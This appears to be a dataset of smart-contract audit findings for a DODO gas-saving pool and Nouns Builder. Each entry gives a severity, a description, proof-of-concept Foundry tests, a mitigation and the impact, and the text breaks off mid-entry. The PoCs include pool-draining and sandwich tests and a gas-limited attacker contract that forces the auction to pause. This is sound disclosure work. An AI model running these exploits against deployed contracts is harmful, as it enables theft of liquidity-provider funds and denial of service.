gsp._QUOTE_RESERVE_());\\n\\n // Quote reserve is 0!!! That means the pool has 0 assets, basically pool has only one asset now!\\n // this behaviour is almost always not a desired behaviour because we never want our assets to be 0 \\n // as a result of swapping or removing liquidity.\\n assertEq(gsp._QUOTE_RESERVE_(), 0);\\n\\n // sell the quote tokens received back to the pool immediately\\n usdc.transfer(address(gsp), receivedQuoteAmount);\\n\\n // cache whatever received base tokens from the selling back\\n uint256 receivedBaseAmount = gsp.sellQuote(hippo);\\n\\n console.log(""Received base amount by hippo"", receivedBaseAmount);\\n console.log(""Base target"", gsp._BASE_TARGET_());\\n console.log(""Quote target"", gsp._QUOTE_TARGET_());\\n console.log(""Base reserve"", gsp._BASE_RESERVE_());\\n console.log(""Quote reserve"", gsp._QUOTE_RESERVE_());\\n \\n // whatever received in base tokens are bigger than our first flashloan! \\n // means that we have a profit!\\n assertGe(receivedBaseAmount, _amount);\\n console.log(""Profit for attack"", receivedBaseAmount - _amount);\\n }\\n```\\n\\nTest results and logs:",Do not allow the pools balance to be 0 or do not let LP_FEE to be 0 in anytime.,"Pool can be drained, funds are lost. Hence, high. Though, this can only happen when there are no ""LP_FEES"". However, when we check the default settings of the deployment, we see here that the LP_FEE is set to 0. So, it is ok to assume that the LP_FEES can be 0.","```\\nfunction test_poolCanBeDrained() public {\\n // @review 99959990000000000000000 this amount makes the reserve 0\\n // run a fuzz test, to get the logs easily I will just use this value as constant but I found it via fuzzing\\n // selling this amount to the pool will make the quote token reserves ""0"".\\n vm.startPrank(tapir);\\n uint256 _amount = 99959990000000000000000;\\n\\n // Buy shares with tapir, 10 - 10 initiate the pool\\n dai.transfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // make sure the values are correct with my math\\n assertTrue(gsp._BASE_RESERVE_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_RESERVE_() == 10 * 1e6);\\n assertTrue(gsp._BASE_TARGET_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_TARGET_() == 10 * 1e6);\\n assertEq(gsp.balanceOf(tapir), 10 * 1e18);\\n vm.stopPrank();\\n \\n // sell such a base token amount such that the quote reserve is 0\\n // I calculated the ""_amount"" already which will make the quote token reserve ""0""\\n vm.startPrank(hippo);\\n deal(DAI, hippo, _amount);\\n dai.transfer(address(gsp), _amount);\\n uint256 receivedQuoteAmount = gsp.sellBase(hippo);\\n\\n // print the reserves and the amount received by hippo when he sold the base tokens\\n console.log(""Received quote amount by hippo"", receivedQuoteAmount);\\n console.log(""Base reserve"", gsp._BASE_RESERVE_());\\n console.log(""Quote reserve"", gsp._QUOTE_RESERVE_());\\n\\n // Quote reserve is 0!!! That means the pool has 0 assets, basically pool has only one asset now!\\n // this behaviour is almost always not a desired behaviour because we never want our assets to be 0 \\n // as a result of swapping or removing liquidity.\\n assertEq(gsp._QUOTE_RESERVE_(), 0);\\n\\n // sell the quote tokens received back to the pool immediately\\n usdc.transfer(address(gsp), receivedQuoteAmount);\\n\\n // cache whatever received base tokens from the selling back\\n uint256 receivedBaseAmount = gsp.sellQuote(hippo);\\n\\n console.log(""Received base amount by hippo"", receivedBaseAmount);\\n console.log(""Base target"", gsp._BASE_TARGET_());\\n console.log(""Quote target"", gsp._QUOTE_TARGET_());\\n console.log(""Base reserve"", gsp._BASE_RESERVE_());\\n console.log(""Quote reserve"", gsp._QUOTE_RESERVE_());\\n \\n // whatever received in base tokens are bigger than our first flashloan! \\n // means that we have a profit!\\n assertGe(receivedBaseAmount, _amount);\\n console.log(""Profit for attack"", receivedBaseAmount - _amount);\\n }\\n```\\n" +"Adjusting ""_I_"" will create a sandwich opportunity because of price changes",medium,"Adjusting the value of ""I"" directly influences the price. This can be exploited by a MEV bot, simply by trading just before the ""adjustPrice"" function and exiting right after the price change. The profit gained from this operation essentially represents potential losses for the liquidity providers who supplied liquidity to the pool.\\nAs we can see in the docs, the ""I"" is the ""i"" value in here and it is directly related with the output amount a trader will receive when selling a quote/base token:\\nSince the price will change, the MEV bot can simply sandwich the tx. Here an example how it can be executed by a MEV bot:\\n```\\nfunction test_Adjusting_I_CanBeFrontrunned() external {\\n vm.startPrank(tapir);\\n\\n // Buy shares with tapir, 10 - 10\\n dai.safeTransfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // print some stuff\\n console.log(""Base target initial"", gsp._BASE_TARGET_());\\n console.log(""Quote target initial"", gsp._QUOTE_TARGET_());\\n console.log(""Base reserve initial"", gsp._BASE_RESERVE_());\\n console.log(""Quote reserve initial"", gsp._QUOTE_RESERVE_());\\n \\n // we know the price will decrease so lets sell the base token before that\\n uint256 initialBaseTokensSwapped = 5 * 1e18;\\n\\n // sell the base tokens before adjustPrice\\n dai.safeTransfer(address(gsp), initialBaseTokensSwapped);\\n uint256 receivedQuoteTokens = gsp.sellBase(tapir);\\n vm.stopPrank();\\n\\n // this is the tx will be sandwiched by the MEV trader\\n vm.prank(MAINTAINER);\\n gsp.adjustPrice(999000);\\n\\n // quickly resell whatever gained by the price update\\n vm.startPrank(tapir);\\n usdc.safeTransfer(address(gsp), receivedQuoteTokens);\\n uint256 receivedBaseTokens = gsp.sellQuote(tapir);\\n console.log(""Base target"", gsp._BASE_TARGET_());\\n console.log(""Quote target"", gsp._QUOTE_TARGET_());\\n console.log(""Base reserve"", gsp._BASE_RESERVE_());\\n console.log(""Quote reserve"", gsp._QUOTE_RESERVE_());\\n console.log(""Received base tokens"", receivedBaseTokens);\\n\\n // NOTE: the LP fee and MT FEE is set for this example, so this is not an rough assumption\\n // where fees are 0. Here the fees set for both of the values (default values):\\n // uint256 constant LP_FEE_RATE = 10000000000000;\\n // uint256 constant MT_FEE_RATE = 10000000000000;\\n\\n // whatever we get is more than we started, in this example\\n // MEV trader started 5 DAI and we have more than 5 DAI!!\\n assertGe(receivedBaseTokens, initialBaseTokensSwapped);\\n }\\n```\\n\\nTest result and logs:\\nAfter the sandwich, we can see that the MEV bot's DAI amount exceeds its initial DAI balance (profits). Additionally, the reserves for both base and quote tokens are less than the initial 10 tokens deposited by the tapir (only LP). The profit gained by the MEV bot essentially translates to a loss for the tapir.\\nAnother note on this is that even though the `adjustPrice` called by MAINTAINER without getting frontrunned, it still creates a big price difference which requires immediate arbitrages. Usually these type of parameter changes that impacts the trades are setted by time via ramping to mitigate the unfair advantages that it can occur during the price update.","Acknowledge the issue and use private RPC's to eliminate front-running or slowly ramp up the ""I"" so that the arbitrage opportunity is fair",,"```\\nfunction test_Adjusting_I_CanBeFrontrunned() external {\\n vm.startPrank(tapir);\\n\\n // Buy shares with tapir, 10 - 10\\n dai.safeTransfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // print some stuff\\n console.log(""Base target initial"", gsp._BASE_TARGET_());\\n console.log(""Quote target initial"", gsp._QUOTE_TARGET_());\\n console.log(""Base reserve initial"", gsp._BASE_RESERVE_());\\n console.log(""Quote reserve initial"", gsp._QUOTE_RESERVE_());\\n \\n // we know the price will decrease so lets sell the base token before that\\n uint256 initialBaseTokensSwapped = 5 * 1e18;\\n\\n // sell the base tokens before adjustPrice\\n dai.safeTransfer(address(gsp), initialBaseTokensSwapped);\\n uint256 receivedQuoteTokens = gsp.sellBase(tapir);\\n vm.stopPrank();\\n\\n // this is the tx will be sandwiched by the MEV trader\\n vm.prank(MAINTAINER);\\n gsp.adjustPrice(999000);\\n\\n // quickly resell whatever gained by the price update\\n vm.startPrank(tapir);\\n usdc.safeTransfer(address(gsp), receivedQuoteTokens);\\n uint256 receivedBaseTokens = gsp.sellQuote(tapir);\\n console.log(""Base target"", gsp._BASE_TARGET_());\\n console.log(""Quote target"", gsp._QUOTE_TARGET_());\\n console.log(""Base reserve"", gsp._BASE_RESERVE_());\\n console.log(""Quote reserve"", gsp._QUOTE_RESERVE_());\\n console.log(""Received base tokens"", receivedBaseTokens);\\n\\n // NOTE: the LP fee and MT FEE is set for this example, so this is not an rough assumption\\n // where fees are 0. Here the fees set for both of the values (default values):\\n // uint256 constant LP_FEE_RATE = 10000000000000;\\n // uint256 constant MT_FEE_RATE = 10000000000000;\\n\\n // whatever we get is more than we started, in this example\\n // MEV trader started 5 DAI and we have more than 5 DAI!!\\n assertGe(receivedBaseTokens, initialBaseTokensSwapped);\\n }\\n```\\n" +First depositor can lock the quote target value to zero,medium,"When the initial deposit occurs, it is possible for the quote target to be set to 0. This situation significantly impacts other LPs as well. Even if subsequent LPs deposit substantial amounts, the quote target remains at 0 due to multiplication with this zero value. 0 QUOTE_TARGET value will impact the swaps that pool facilities\\nWhen the first deposit happens, QUOTE_TARGET is set as follows:\\n```\\n if (totalSupply == 0) {\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_)\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance;\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n _QUOTE_TARGET_ = uint112(DecimalMath.mulFloor(shares, _I_));\\n```\\n\\nIn this scenario, the 'shares' value can be a minimum of 1e3, as indicated here: link to code snippet.\\nThis implies that if someone deposits minuscule amounts of quote token and base token, they can set the QUOTE_TARGET to zero because the `mulFloor` operation uses a scaling factor of 1e18:\\n```\\nfunction mulFloor(uint256 target, uint256 d) internal pure returns (uint256) {\\n return target * d / (10 ** 18);\\n }\\n```\\n\\n```\\n// @review 0 + (0 * something) = 0! doesn't matter what amount has been deposited !\\n_QUOTE_TARGET_ = uint112(uint256(_QUOTE_TARGET_) + (DecimalMath.mulFloor(uint256(_QUOTE_TARGET_), mintRatio)));\\n```\\n\\nHere a PoC shows that if the first deposit is tiny the QUOTE_TARGET is 0. Also, whatever deposits after goes through the QUOTE_TARGET still 0 because of the multiplication with 0!\\n```\\nfunction test_StartWithZeroTarget() external {\\n // tapir deposits tiny amounts to make quote target 0\\n vm.startPrank(tapir);\\n dai.safeTransfer(address(gsp), 1 * 1e5);\\n usdc.transfer(address(gsp), 1 * 1e5);\\n gsp.buyShares(tapir);\\n\\n console.log(""Base target"", gsp._BASE_TARGET_());\\n console.log(""Quote target"", gsp._QUOTE_TARGET_());\\n console.log(""Base reserve"", gsp._BASE_RESERVE_());\\n console.log(""Quote reserve"", gsp._QUOTE_RESERVE_());\\n\\n // quote target is indeed 0!\\n assertEq(gsp._QUOTE_TARGET_(), 0);\\n\\n vm.stopPrank();\\n\\n // hippo deposits properly\\n vm.startPrank(hippo);\\n dai.safeTransfer(address(gsp), 1000 * 1e18);\\n usdc.transfer(address(gsp), 10000 * 1e6);\\n gsp.buyShares(hippo);\\n\\n console.log(""Base target"", gsp._BASE_TARGET_());\\n console.log(""Quote target"", gsp._QUOTE_TARGET_());\\n console.log(""Base reserve"", gsp._BASE_RESERVE_());\\n console.log(""Quote reserve"", gsp._QUOTE_RESERVE_());\\n\\n // although hippo deposited 1000 USDC as quote tokens, target is still 0 due to multiplication with 0\\n assertEq(gsp._QUOTE_TARGET_(), 0);\\n }\\n```\\n\\nTest result and logs:","According to the quote tokens decimals, multiply the quote token balance with the proper decimal scalor.",Since the quote target is important and used when pool deciding the swap math I will label this as high.,"```\\n if (totalSupply == 0) {\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_)\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance;\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n _QUOTE_TARGET_ = uint112(DecimalMath.mulFloor(shares, _I_));\\n```\\n" +"Share Price Inflation by First LP-er, Enabling DOS Attacks on Subsequent buyShares with Up to 1001x the Attacking Cost",medium,"The smart contract contains a critical vulnerability that allows a malicious actor to manipulate the share price during the initialization of the liquidity pool, potentially leading to a DOS attack on subsequent buyShares operations.\\nThe root cause of the vulnerability lies in the initialization process of the liquidity pool, specifically in the calculation of shares during the first deposit.\\n```\\n// Findings are labeled with '<= FOUND'\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_) // <= FOUND\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance; // @audit-info mint shares based on min balance(base, quote)\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n // rest of code\\n }\\n```\\n\\nIf the pool is empty, the smart contract directly sets the share value based on the minimium value of the base token denominated value of the provided assets. This assumption can be manipulated by a malicious actor during the first deposit, leading to a situation where the LP pool token becomes extremely expensive.\\nAttack Scenario\\nThe attacker exploits the vulnerability during the initialization of the liquidity pool:\\nThe attacker mints 1001 `shares` during the first deposit.\\nImmediately, the attacker sells back 1000 `shares`, ensuring to keep 1 wei via the `sellShares` function.\\nThe attacker then donates a large amount (1000e18) of base and quote tokens and invokes the `sync()` routine to pump the base and quote reserves to 1001 + 1000e18.\\nThe protocol users proceed to execute the `buyShares` function with a balance less than `attacker's spending * 1001`. The transaction reverts due to the `mintRatio` being kept below 1001 wad and the computed `shares` less than 1001 (line 71), while it needs a value >= 1001 to mint `shares` successfully.\\n```\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n // case 2. normal case\\n uint256 baseInputRatio = DecimalMath.divFloor(baseInput, baseReserve);\\n uint256 quoteInputRatio = DecimalMath.divFloor(quoteInput, quoteReserve);\\n uint256 mintRatio = quoteInputRatio < baseInputRatio ? quoteInputRatio : baseInputRatio; // <= FOUND: mintRatio below 1001wad if input amount smaller than reserves * 1001\\n // The shares will be minted to user\\n shares = DecimalMath.mulFloor(totalSupply, mintRatio); // <= FOUND: the manipulated totalSupply of 1wei requires a mintRatio of greater than 1000 for a successful _mint()\\n // rest of code\\n }\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPVault.sol\\n function _mint(address user, uint256 value) internal {\\n require(value > 1000, ""MINT_AMOUNT_NOT_ENOUGH""); // <= FOUND: next buyShares with volume less than 1001 x attacker balance will revert here\\n// rest of code\\n }\\n```\\n\\nThe `_mint()` function fails with a ""MINT_AMOUNT_NOT_ENOUGH"" error, causing a denial-of-service condition for subsequent buyShares operations.\\nPOC\\n```\\n// File: dodo-gassaving-pool/test/GPSTrader.t.sol\\n function test_mint1weiShares_DOSx1000DonationVolume() public {\\n GSP gspTest = new GSP();\\n gspTest.init(\\n MAINTAINER,\\n address(mockBaseToken),\\n address(mockQuoteToken),\\n 0,\\n 0,\\n 1000000,\\n 500000000000000,\\n false\\n );\\n\\n // Buy 1001 shares\\n vm.startPrank(USER);\\n mockBaseToken.transfer(address(gspTest), 1001);\\n mockQuoteToken.transfer(address(gspTest), 1001 * gspTest._I_() / 1e18);\\n gspTest.buyShares(USER);\\n assertEq(gspTest.balanceOf(USER), 1001);\\n\\n // User sells shares and keep ONLY 1wei\\n gspTest.sellShares(1000, USER, 0, 0, """", block.timestamp);\\n assertEq(gspTest.balanceOf(USER), 1);\\n\\n // User donate a huge amount of base & quote tokens to inflate the share price\\n uint256 donationAmount = 1000e18;\\n mockBaseToken.transfer(address(gspTest), donationAmount);\\n mockQuoteToken.transfer(address(gspTest), donationAmount * gspTest._I_() / 1e18);\\n gspTest.sync();\\n vm.stopPrank();\\n\\n // DOS subsequent operations with roughly 1001 x donation volume\\n uint256 dosAmount = donationAmount * 1001;\\n mockBaseToken.mint(OTHER, type(uint256).max);\\n mockQuoteToken.mint(OTHER, type(uint256).max);\\n\\n vm.startPrank(OTHER);\\n mockBaseToken.transfer(address(gspTest), dosAmount);\\n mockQuoteToken.transfer(address(gspTest), dosAmount * gspTest._I_() / 1e18);\\n\\n vm.expectRevert(""MINT_AMOUNT_NOT_ENOUGH"");\\n gspTest.buyShares(OTHER);\\n vm.stopPrank();\\n }\\n```\\n\\nA PASS result would confirm that any deposits with volume less than 1001 times to attacker cost would fail. That means by spending $1000, the attacker can DOS any transaction with volume below $1001,000.","A mechanism should be implemented to handle the case of zero totalSupply during initialization. A potential solution is inspired by Uniswap V2 Core Code, which sends the first 1001 LP tokens to the zero address. This way, it's extremely costly to inflate the share price as much as 1001 times on the first deposit.\\n```\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n if (totalSupply == 0) {\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_)\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance; \\n+ _mint(address(0), 1001); // permanently lock the first MINIMUM_LIQUIDITY of 1001 tokens, makes it imposible to manipulate the totalSupply to 1 wei\\n// rest of code\\n``` // rest of code\\n```\\n","The impact of this vulnerability is severe, as it allows an attacker to conduct DOS attacks on buyShares with a low attacking cost (retrievable for further attacks via sellShares). This significantly impairs the core functionality of the protocol, potentially preventing further LP operations and hindering the protocol's ability to attract Total Value Locked (TVL) for other trading operations such as sellBase, sellQuote and flashloan.","```\\n// Findings are labeled with '<= FOUND'\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_) // <= FOUND\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance; // @audit-info mint shares based on min balance(base, quote)\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n // rest of code\\n }\\n```\\n" +Attacker can force pause the Auction contract.,medium,"In certain situations (e.g founders have ownership percentage greater than 51) an attacker can potentially exploit the `try catch` within the `Auction._CreateAuction()` function to arbitrarily pause the auction contract.\\nConsider the code from `Auction._CreateAuction()` function, which is called by `Auction.settleCurrentAndCreateNewAuction()`. It first tries to mint a new token for the auction, and if the minting fails the `catch` branch will be triggered, pausing the auction.\\n```\\nfunction _createAuction() private returns (bool) {\\n // Get the next token available for bidding\\n try token.mint() returns (uint256 tokenId) {\\n // Store the token id\\n auction.tokenId = tokenId;\\n\\n // Cache the current timestamp\\n uint256 startTime = block.timestamp;\\n\\n // Used to store the auction end time\\n uint256 endTime;\\n\\n // Cannot realistically overflow\\n unchecked {\\n // Compute the auction end time\\n endTime = startTime + settings.duration;\\n }\\n\\n // Store the auction start and end time\\n auction.startTime = uint40(startTime);\\n auction.endTime = uint40(endTime);\\n\\n // Reset data from the previous auction\\n auction.highestBid = 0;\\n auction.highestBidder = address(0);\\n auction.settled = false;\\n\\n // Reset referral from the previous auction\\n currentBidReferral = address(0);\\n\\n emit AuctionCreated(tokenId, startTime, endTime);\\n return true;\\n } catch {\\n // Pause the contract if token minting failed\\n _pause();\\n return false;\\n }\\n}\\n```\\n\\nDue to the internal logic of the `mint` function, if there are founders with high ownership percentages, many tokens can be minted to them during calls to mintas part of the vesting mechanism. As a consequence of this under some circumstances calls to `mint` can consume huge amounts of gas.\\nCurrently on Ethereum and EVM-compatible chains, calls can consume at most 63/64 of the parent's call gas (See EIP-150). An attacker can exploit this circumstances of high gas cost to restrict the parent gas call limit, making `token.mint()` fail and still leaving enough gas left (1/64) for the `_pause()` call to succeed. Therefore he is able to force the pausing of the auction contract at will.\\nBased on the gas requirements (1/64 of the gas calls has to be enough for `_pause()` gas cost of 21572), then `token.mint()` will need to consume at least 1359036 gas (63 * 21572), consequently it is only possible on some situations like founders with high percentage of vesting, for example 51 or more.\\nConsider the following POC. Here we are using another contract to restrict the gas limit of the call, but this can also be done with an EOA call from the attacker.\\nExploit contract code:\\n```\\npragma solidity ^0.8.16;\\n\\ncontract Attacker {\\n function forcePause(address target) external {\\n bytes4 selector = bytes4(keccak256(""settleCurrentAndCreateNewAuction()""));\\n assembly {\\n let ptr := mload(0x40)\\n mstore(ptr,selector)\\n let success := call(1500000, target, 0, ptr, 4, 0, 0)\\n }\\n }\\n}\\n```\\n\\nPOC:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.16;\\n\\nimport { NounsBuilderTest } from ""./utils/NounsBuilderTest.sol"";\\nimport { MockERC721 } from ""./utils/mocks/MockERC721.sol"";\\nimport { MockImpl } from ""./utils/mocks/MockImpl.sol"";\\nimport { MockPartialTokenImpl } from ""./utils/mocks/MockPartialTokenImpl.sol"";\\nimport { MockProtocolRewards } from ""./utils/mocks/MockProtocolRewards.sol"";\\nimport { Auction } from ""../src/auction/Auction.sol"";\\nimport { IAuction } from ""../src/auction/IAuction.sol"";\\nimport { AuctionTypesV2 } from ""../src/auction/types/AuctionTypesV2.sol"";\\nimport { TokenTypesV2 } from ""../src/token/types/TokenTypesV2.sol"";\\nimport { Attacker } from ""./Attacker.sol"";\\n\\ncontract AuctionTest is NounsBuilderTest {\\n MockImpl internal mockImpl;\\n Auction internal rewardImpl;\\n Attacker internal attacker;\\n address internal bidder1;\\n address internal bidder2;\\n address internal referral;\\n uint16 internal builderRewardBPS = 300;\\n uint16 internal referralRewardBPS = 400;\\n\\n function setUp() public virtual override {\\n super.setUp();\\n bidder1 = vm.addr(0xB1);\\n bidder2 = vm.addr(0xB2);\\n vm.deal(bidder1, 100 ether);\\n vm.deal(bidder2, 100 ether);\\n mockImpl = new MockImpl();\\n rewardImpl = new Auction(address(manager), address(rewards), weth, builderRewardBPS, referralRewardBPS);\\n attacker = new Attacker();\\n }\\n\\n function test_POC() public {\\n // START OF SETUP\\n address[] memory wallets = new address[](1);\\n uint256[] memory percents = new uint256[](1);\\n uint256[] memory vestingEnds = new uint256[](1);\\n wallets[0] = founder;\\n percents[0] = 99;\\n vestingEnds[0] = 4 weeks;\\n //Setting founder with high percentage ownership.\\n setFounderParams(wallets, percents, vestingEnds);\\n setMockTokenParams();\\n setMockAuctionParams();\\n setMockGovParams();\\n deploy(foundersArr, tokenParams, auctionParams, govParams);\\n setMockMetadata();\\n // END OF SETUP\\n\\n // Start auction contract and do the first auction\\n vm.prank(founder);\\n auction.unpause();\\n vm.prank(bidder1);\\n auction.createBid{ value: 0.420 ether }(99);\\n vm.prank(bidder2);\\n auction.createBid{ value: 1 ether }(99);\\n\\n // Move block.timestamp so auction can end.\\n vm.warp(10 minutes + 1 seconds);\\n\\n //Attacker calls the auction\\n attacker.forcePause(address(auction));\\n\\n //Check that auction was paused.\\n assertEq(auction.paused(), true);\\n }\\n}\\n```\\n","Consider better handling the possible errors from `Token.mint()`, like shown below:\\n```\\n function _createAuction() private returns (bool) {\\n // Get the next token available for bidding\\n try token.mint() returns (uint256 tokenId) {\\n //CODE OMMITED\\n } catch (bytes memory err) {\\n // On production consider pre-calculating the hash values to save gas\\n if (keccak256(abi.encodeWithSignature(""NO_METADATA_GENERATED()"")) == keccak256(err)) {\\n _pause();\\n return false\\n } else if (keccak256(abi.encodeWithSignature(""ALREADY_MINTED()"") == keccak256(err)) {\\n _pause();\\n return false\\n } else {\\n revert OUT_OF_GAS();\\n }\\n } \\n```\\n","Should the conditions mentioned above be met, an attacker can arbitrarily pause the auction contract, effectively interrupting the DAO auction process. This pause persists until owners takes subsequent actions to unpause the contract. The attacker can exploit this vulnerability repeatedly.","```\\nfunction _createAuction() private returns (bool) {\\n // Get the next token available for bidding\\n try token.mint() returns (uint256 tokenId) {\\n // Store the token id\\n auction.tokenId = tokenId;\\n\\n // Cache the current timestamp\\n uint256 startTime = block.timestamp;\\n\\n // Used to store the auction end time\\n uint256 endTime;\\n\\n // Cannot realistically overflow\\n unchecked {\\n // Compute the auction end time\\n endTime = startTime + settings.duration;\\n }\\n\\n // Store the auction start and end time\\n auction.startTime = uint40(startTime);\\n auction.endTime = uint40(endTime);\\n\\n // Reset data from the previous auction\\n auction.highestBid = 0;\\n auction.highestBidder = address(0);\\n auction.settled = false;\\n\\n // Reset referral from the previous auction\\n currentBidReferral = address(0);\\n\\n emit AuctionCreated(tokenId, startTime, endTime);\\n return true;\\n } catch {\\n // Pause the contract if token minting failed\\n _pause();\\n return false;\\n }\\n}\\n```\\n" +MerkleReserveMinter minting methodology is incompatible with current governance structure and can lead to migrated DAOs being hijacked immediately,medium,"MerkleReserveMinter allows large number of tokens to be minted instantaneously which is incompatible with the current governance structure which relies on tokens being minted individually and time locked after minting by the auction. By minting and creating a proposal in the same block a user is able to create a proposal with significantly lower quorum than expected. This could easily be used to hijack the migrated DAO.\\nMerkleReserveMinter.sol#L154-L167\\n```\\nunchecked {\\n for (uint256 i = 0; i < claimCount; ++i) {\\n // Load claim in memory\\n MerkleClaim memory claim = claims[I];\\n\\n // Requires one proof per tokenId to handle cases where users want to partially claim\\n if (!MerkleProof.verify(claim.merkleProof, settings.merkleRoot, keccak256(abi.encode(claim.mintTo, claim.tokenId)))) {\\n revert INVALID_MERKLE_PROOF(claim.mintTo, claim.merkleProof, settings.merkleRoot);\\n }\\n\\n // Only allowing reserved tokens to be minted for this strategy\\n IToken(tokenContract).mintFromReserveTo(claim.mintTo, claim.tokenId);\\n }\\n}\\n```\\n\\nWhen minting from the claim merkle tree, a user is able to mint as many tokens as they want in a single transaction. This means in a single transaction, the supply of the token can increase very dramatically. Now we'll take a look at the governor contract as to why this is such an issue.\\nGovernor.sol#L184-L192\\n```\\n // Store the proposal data\\n proposal.voteStart = SafeCast.toUint32(snapshot);\\n proposal.voteEnd = SafeCast.toUint32(deadline);\\n proposal.proposalThreshold = SafeCast.toUint32(currentProposalThreshold);\\n proposal.quorumVotes = SafeCast.toUint32(quorum());\\n proposal.proposer = msg.sender;\\n proposal.timeCreated = SafeCast.toUint32(block.timestamp);\\n\\n emit ProposalCreated(proposalId, _targets, _values, _calldatas, _description, descriptionHash, proposal);\\n```\\n\\nGovernor.sol#L495-L499\\n```\\nfunction quorum() public view returns (uint256) {\\n unchecked {\\n return (settings.token.totalSupply() * settings.quorumThresholdBps) / BPS_PER_100_PERCENT;\\n }\\n}\\n```\\n\\nWhen creating a proposal, we see that it uses a snapshot of the CURRENT total supply. This is what leads to the issue. The setup is fairly straightforward and occurs all in a single transaction:\\nCreate a malicious proposal (which snapshots current supply)\\nMint all the tokens\\nVote on malicious proposal with all minted tokens\\nThe reason this works is because the quorum is based on the supply before the mint while votes are considered after the mint, allowing significant manipulation of the quorum.","Token should be changed to use a checkpoint based total supply, similar to how balances are handled. Quorum should be based on that instead of the current supply.",DOA can be completely hijacked,"```\\nunchecked {\\n for (uint256 i = 0; i < claimCount; ++i) {\\n // Load claim in memory\\n MerkleClaim memory claim = claims[I];\\n\\n // Requires one proof per tokenId to handle cases where users want to partially claim\\n if (!MerkleProof.verify(claim.merkleProof, settings.merkleRoot, keccak256(abi.encode(claim.mintTo, claim.tokenId)))) {\\n revert INVALID_MERKLE_PROOF(claim.mintTo, claim.merkleProof, settings.merkleRoot);\\n }\\n\\n // Only allowing reserved tokens to be minted for this strategy\\n IToken(tokenContract).mintFromReserveTo(claim.mintTo, claim.tokenId);\\n }\\n}\\n```\\n" +when reservedUntilTokenId > 100 first funder loss 1% NFT,high,"The incorrect use of `baseTokenId = reservedUntilTokenId` may result in the first `tokenRecipient[]` being invalid, thus preventing the founder from obtaining this portion of the NFT.\\nThe current protocol adds a parameter `reservedUntilTokenId` for reserving `Token`. This parameter will be used as the starting `baseTokenId` during initialization.\\n```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n uint256 baseTokenId = reservedUntilTokenId;\\n\\n // For each token to vest:\\n for (uint256 j; j < founderPct; ++j) {\\n // Get the available token id\\n baseTokenId = _getNextTokenId(baseTokenId);\\n\\n // Store the founder as the recipient\\n tokenRecipient[baseTokenId] = newFounder;\\n\\n emit MintScheduled(baseTokenId, founderId, newFounder);\\n\\n // Update the base token id\\n baseTokenId = (baseTokenId + schedule) % 100;\\n }\\n }\\n..\\n\\n function _getNextTokenId(uint256 _tokenId) internal view returns (uint256) {\\n unchecked {\\n while (tokenRecipient[_tokenId].wallet != address(0)) {\\n _tokenId = (++_tokenId) % 100;\\n }\\n\\n return _tokenId;\\n }\\n }\\n```\\n\\nBecause `baseTokenId = reservedUntilTokenId` is used, if `reservedUntilTokenId>100`, for example, reservedUntilTokenId=200, the first `_getNextTokenId(200)` will return `baseTokenId=200 , tokenRecipient[200]=newFounder`.\\nExample: reservedUntilTokenId = 200 founder[0].founderPct = 10\\nIn this way, the `tokenRecipient[]` of `founder` will become tokenRecipient[200].wallet = `founder` ( first will call _getNextTokenId(200) return 200) tokenRecipient[10].wallet = `founder` ( second will call _getNextTokenId((200 + 10) %100 = 10) ) tokenRecipient[20].wallet = `founder` ... tokenRecipient[90].wallet = `founder`\\nHowever, this `tokenRecipient[200]` will never be used, because in `_isForFounder()`, it will be modulo, so only `baseTokenId < 100` is valid. In this way, the first founder can actually only `9%` of NFT.\\n```\\n function _isForFounder(uint256 _tokenId) private returns (bool) {\\n // Get the base token id\\n uint256 baseTokenId = _tokenId % 100;\\n\\n // If there is no scheduled recipient:\\n if (tokenRecipient[baseTokenId].wallet == address(0)) {\\n return false;\\n\\n // Else if the founder is still vesting:\\n } else if (block.timestamp < tokenRecipient[baseTokenId].vestExpiry) {\\n // Mint the token to the founder\\n _mint(tokenRecipient[baseTokenId].wallet, _tokenId);\\n\\n return true;\\n\\n // Else the founder has finished vesting:\\n } else {\\n // Remove them from future lookups\\n delete tokenRecipient[baseTokenId];\\n\\n return false;\\n }\\n }\\n```\\n\\nPOC\\nThe following test demonstrates that `tokenRecipient[200]` is for founder.\\nneed change tokenRecipient to public , so can assertEq\\n```\\ncontract 